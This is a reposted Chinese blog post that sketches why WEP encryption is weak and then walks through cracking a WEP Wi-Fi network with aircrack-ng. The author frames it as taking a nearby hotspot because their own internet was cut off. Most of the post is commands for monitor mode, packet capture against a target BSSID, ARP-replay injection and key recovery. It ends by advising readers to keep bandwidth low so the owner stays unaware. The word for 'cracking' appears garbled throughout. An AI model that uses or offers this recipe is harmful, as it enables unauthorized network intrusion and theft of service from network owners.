wep加密激活成功教程原理简述 & 实战

wep加密激活成功教程原理简述 & 实战IV 初始向量 随机生成 PASSWORD 用户密码 我们的激活成功教程目标 KSA 和 PRGA 简单理解为一个加密函数就行 DATA nbsp 为我们要传输的数据 CRC 32 为 DATA 的校验码为明文的完整性校验值 PRGA RC4 KSA http zhaoxiaobu blog 51cto com http www 2cto com k

没钱交网费,断网了。只能打开wiki扫描,碰碰运气,看看能不能找到没加密的。结果没有,但却发现有用wep加密的热点信号不错,而且经常在线。印象中,wep是不安全的加密方式,但不清楚是不是用不靠谱的字典方式暴力激活成功教程。

用手机查了一下,发现有靠谱的激活成功教程方法,开搞!得意

wep加密激活成功教程原理简述 & 实战

左图:

  • IV 初始向量,随机生成。
  • PASSWORD用户密码。我们的激活成功教程目标
  • KSA 和 PRGA 简单理解为一个加密函数就行。
  • DATA 为我们要传输的数据
  • CRC-32为DATA的校验码,为明文的完整性校验值。实际上跟这里的激活成功教程无关,可以忽略。
  • PRGA=RC4(KSA) 

简化版就是 加密数据 = f (原数据, IV, 密码)

右图:

解出IV,然后加上客户端知道的密码,生成解密算法,然后跟密文xor一下即可。

 

要点就是

  • IV随机生成,会变化的,而且是明文传输。
  • 加密算法有缺陷,导致可以根据IV反推密码。

因为不是专门搞这块的,细节就不想去深究了。睡觉

参考资料

http://zhaoxiaobu.blog.51cto.com//


下面讲激活成功教程,搜了一些教程,命令各不相同,所以自己总结了下。工具请先到有网络的地方下载大笑


/* 命令的参数为了明显一点我用【中括号】括起来了,使用时注意替换为自己对应的值。*/

0.安装工具。我用的是ubuntu。没有linux的环境的看看网上介绍的backtrack5或者beini。

sudo apt-get install aircrack-ng

1.查看自己的网卡接口,一般是wlan0;顺便记下自己网卡的地址备用。

ifconfig

2.开启网卡监控模式,最后一个参数是频道,可以不加。失败的话再加上试试。成功时会看到(monitor mode enabled on mon0),mon0就是启动的接口名

sudo airmon-ng start 【wlan0】 【1】

3.看看有哪些采用wep加密的AP在线,然后按 ctrl+c 可以退出。注意,wep加密的才行,同时还能看到bssid(网卡地址)和ch(频道),不清楚这个ch跟上面启动时指定的ch有没关系。

sudo airodump-ng 【mon0】

4.抓取数据包写入文件

sudo airodump-ng -c 【6】 --bssid 【MAC】 -w 【wep】 【mon0】

-c 和 –bssid 两个参数是上面的步骤获取的。
-w 是输出的文件名,会有对应的*.cap *.csv等文件
mon0 名字跟第三步对应

注意看#data的数值。它代表了我们迄今一共抓取到的有用的数据包数量。运气好的话它应该是在一直增长的,即使可能很慢。老实说我们需要大概5000-25000个才能激活成功教程密码。

5.数据包太少就自己注入(可选步骤) /* 我的机器上运行不成功,google了一了,好像是得装bt5之类的linux版本才行。*/
aireplay-ng –arpreplay -b 【bssid】 -h 【自己网卡mac】 【mon0】

6.当收集的数据包数量达到5000后,我们就可以开始激活成功教程这些包了。打开一个新终端,输入(原来抓包的终端不用停,让它继续跑):
aircrack-ng -z -b 【bssid】 【wep.cap】

激活成功教程速度很快,我跑的结果不到一分钟就出来了 Tested 9 keys (got 42637 IVs)
然后把下面key found 那个字段去掉标点符号就是密码了。

估计不是用户的原始密码,只是最后算出来的数值跟用户的密码一致。惊讶

sudo airmon-ng stop 【mon0】

参考文章

http://www.geekfan.net/1713/

http://blog.163.com/prettysnail@126/blog/static/24/

注意控制自己的带宽,不要影响原来主人正常上网。生气  提供宽带利用率,不亦乐乎!












































版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/209739.html原文链接:https://javaforall.net

(0)
上一篇 2026年3月19日 上午8:31
下一篇 2026年3月19日 上午8:31


相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号